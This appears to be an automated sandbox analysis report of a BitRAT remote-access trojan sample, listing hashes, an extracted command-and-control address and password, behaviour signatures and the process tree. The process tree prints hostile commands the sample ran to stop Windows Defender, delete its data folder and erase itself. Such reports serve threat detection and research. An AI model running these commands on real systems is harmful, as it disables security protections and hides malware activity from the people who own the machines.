Analysis
-
max time kernel
142s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2023 19:49
Static task
static1
Behavioral task
behavioral1
Sample
8924a53be46439d1c258a10b59596b77.exe
Resource
win7-20231215-en
General
-
Target
8924a53be46439d1c258a10b59596b77.exe
-
Size
3.0MB
-
MD5
8924a53be46439d1c258a10b59596b77
-
SHA1
6cf13347e475772a66e67f5f529a908956dfd00d
-
SHA256
08b44be5d6721d2b20fa1de5fa8d1f80d84d9d424f6fefc06b01a9a81670aec8
-
SHA512
b322d44280e7eff437d0c429f6cfd7af7cf05ea0a8598a9dd42a89b1b6712a1c5f80f1a676d7e1eaf71188f82b68e5c32078e3b376efea97c81df2d594b8eeab
-
SSDEEP
49152:YJXZRkXRxWCBu72E76E5jXVL5w9lmVOALga7n0Yy:Ky
Malware Config
Extracted
bitrat
1.38
194.33.45.3:4898
-
communication_password
89ec00ac3524ab4f7edd70785d23e302
-
tor_process
tor
Signatures
-
Nirsoft 1 IoCs
resource yara_rule behavioral2/files/0x000700000002321a-63.dat Nirsoft -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation 8924a53be46439d1c258a10b59596b77.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation AdvancedRun.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation AdvancedRun.exe -
Executes dropped EXE 4 IoCs
pid Process 1540 AdvancedRun.exe 4684 AdvancedRun.exe 4864 AdvancedRun.exe 5012 AdvancedRun.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 244 8924a53be46439d1c258a10b59596b77.exe 244 8924a53be46439d1c258a10b59596b77.exe 244 8924a53be46439d1c258a10b59596b77.exe 244 8924a53be46439d1c258a10b59596b77.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3996 set thread context of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 49 IoCs
pid Process 2956 powershell.exe 2956 powershell.exe 696 powershell.exe 696 powershell.exe 2904 powershell.exe 2904 powershell.exe 1540 AdvancedRun.exe 1540 AdvancedRun.exe 1540 AdvancedRun.exe 1540 AdvancedRun.exe 4684 AdvancedRun.exe 4684 AdvancedRun.exe 4684 AdvancedRun.exe 4684 AdvancedRun.exe 4864 AdvancedRun.exe 4864 AdvancedRun.exe 4864 AdvancedRun.exe 4864 AdvancedRun.exe 5012 AdvancedRun.exe 5012 AdvancedRun.exe 5012 AdvancedRun.exe 5012 AdvancedRun.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 3996 8924a53be46439d1c258a10b59596b77.exe 624 powershell.exe 624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 3996 8924a53be46439d1c258a10b59596b77.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeDebugPrivilege 696 powershell.exe Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 1540 AdvancedRun.exe Token: SeImpersonatePrivilege 1540 AdvancedRun.exe Token: SeDebugPrivilege 4684 AdvancedRun.exe Token: SeImpersonatePrivilege 4684 AdvancedRun.exe Token: SeDebugPrivilege 4864 AdvancedRun.exe Token: SeImpersonatePrivilege 4864 AdvancedRun.exe Token: SeDebugPrivilege 5012 AdvancedRun.exe Token: SeImpersonatePrivilege 5012 AdvancedRun.exe Token: SeDebugPrivilege 624 powershell.exe Token: SeShutdownPrivilege 244 8924a53be46439d1c258a10b59596b77.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 244 8924a53be46439d1c258a10b59596b77.exe 244 8924a53be46439d1c258a10b59596b77.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 3996 wrote to memory of 2956 3996 8924a53be46439d1c258a10b59596b77.exe 94 PID 3996 wrote to memory of 2956 3996 8924a53be46439d1c258a10b59596b77.exe 94 PID 3996 wrote to memory of 2956 3996 8924a53be46439d1c258a10b59596b77.exe 94 PID 3996 wrote to memory of 696 3996 8924a53be46439d1c258a10b59596b77.exe 99 PID 3996 wrote to memory of 696 3996 8924a53be46439d1c258a10b59596b77.exe 99 PID 3996 wrote to memory of 696 3996 8924a53be46439d1c258a10b59596b77.exe 99 PID 3996 wrote to memory of 2904 3996 8924a53be46439d1c258a10b59596b77.exe 100 PID 3996 wrote to memory of 2904 3996 8924a53be46439d1c258a10b59596b77.exe 100 PID 3996 wrote to memory of 2904 3996 8924a53be46439d1c258a10b59596b77.exe 100 PID 3996 wrote to memory of 1540 3996 8924a53be46439d1c258a10b59596b77.exe 105 PID 3996 wrote to memory of 1540 3996 8924a53be46439d1c258a10b59596b77.exe 105 PID 3996 wrote to memory of 1540 3996 8924a53be46439d1c258a10b59596b77.exe 105 PID 1540 wrote to memory of 4684 1540 AdvancedRun.exe 106 PID 1540 wrote to memory of 4684 1540 AdvancedRun.exe 106 PID 1540 wrote to memory of 4684 1540 AdvancedRun.exe 106 PID 3996 wrote to memory of 4864 3996 8924a53be46439d1c258a10b59596b77.exe 108 PID 3996 wrote to memory of 4864 3996 8924a53be46439d1c258a10b59596b77.exe 108 PID 3996 wrote to memory of 4864 3996 8924a53be46439d1c258a10b59596b77.exe 108 PID 4864 wrote to memory of 5012 4864 AdvancedRun.exe 109 PID 4864 wrote to memory of 5012 4864 AdvancedRun.exe 109 PID 4864 wrote to memory of 5012 4864 AdvancedRun.exe 109 PID 3996 wrote to memory of 624 3996 8924a53be46439d1c258a10b59596b77.exe 110 PID 3996 wrote to memory of 624 3996 8924a53be46439d1c258a10b59596b77.exe 110 PID 3996 wrote to memory of 624 3996 8924a53be46439d1c258a10b59596b77.exe 110 PID 3996 wrote to memory of 4100 3996 8924a53be46439d1c258a10b59596b77.exe 112 PID 3996 wrote to memory of 4100 3996 8924a53be46439d1c258a10b59596b77.exe 112 PID 3996 wrote to memory of 4100 3996 8924a53be46439d1c258a10b59596b77.exe 112 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113 PID 3996 wrote to memory of 244 3996 8924a53be46439d1c258a10b59596b77.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\8924a53be46439d1c258a10b59596b77.exe"C:\Users\Admin\AppData\Local\Temp\8924a53be46439d1c258a10b59596b77.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 52⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 52⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 52⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 15403⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 48643⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Local\Temp\8924a53be46439d1c258a10b59596b77.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
C:\Users\Admin\AppData\Local\Temp\8924a53be46439d1c258a10b59596b77.exeC:\Users\Admin\AppData\Local\Temp\8924a53be46439d1c258a10b59596b77.exe2⤵PID:4100
-
-
C:\Users\Admin\AppData\Local\Temp\8924a53be46439d1c258a10b59596b77.exeC:\Users\Admin\AppData\Local\Temp\8924a53be46439d1c258a10b59596b77.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:244
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
16KB
MD5b022611eea90381b5ca48efb17df14d6
SHA1b29639a9712e1a00d122e90a5731a41fce4842f9
SHA256225d6236815aa88f653457487c036215e89c2e9c474ee0ca76bf02ef94a0c5dd
SHA5128b58dc2112b524c094b83a458e8686225027051e93eb038a5f1d87935b6bac595e93f73d397fa4755bed63538150fa3e2d2e77c7d2afdf90124f82db06c70baf
-
Filesize
16KB
MD5d66ba96f064931f532efcdd7d1cad3a2
SHA12cb46e4a5b108d774bd5d6d58790bf2170ed050e
SHA256438ffef6590f7bc79ef72d000937eea907b98c251861a95b91700633edfe579f
SHA512b1dde20f21c374c969ab3b81daae9eca7bde6fda06a7fa44780255f386d054b6d93ba677f4f1779eedad6a057fe21083df24840664bf7b00ea8c78f355f9bc22
-
Filesize
16KB
MD55d649685014806eb58733f9d8f83a599
SHA18bb0ce8af559dc45c627ec0fb6de731eb459fab3
SHA25682f7f0023949f044b9c9a25082862b3507c478f87a8cf80ee0752249a889bad5
SHA512863841254d6a5940c3cd47d275a20ee183476e06e8615ad349e7482ecf90822a8babac0eae23f4f13a13d6940b1eb92a2bf1a89939b90ae92c90aa1a41163a21
-
Filesize
88KB
MD517fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82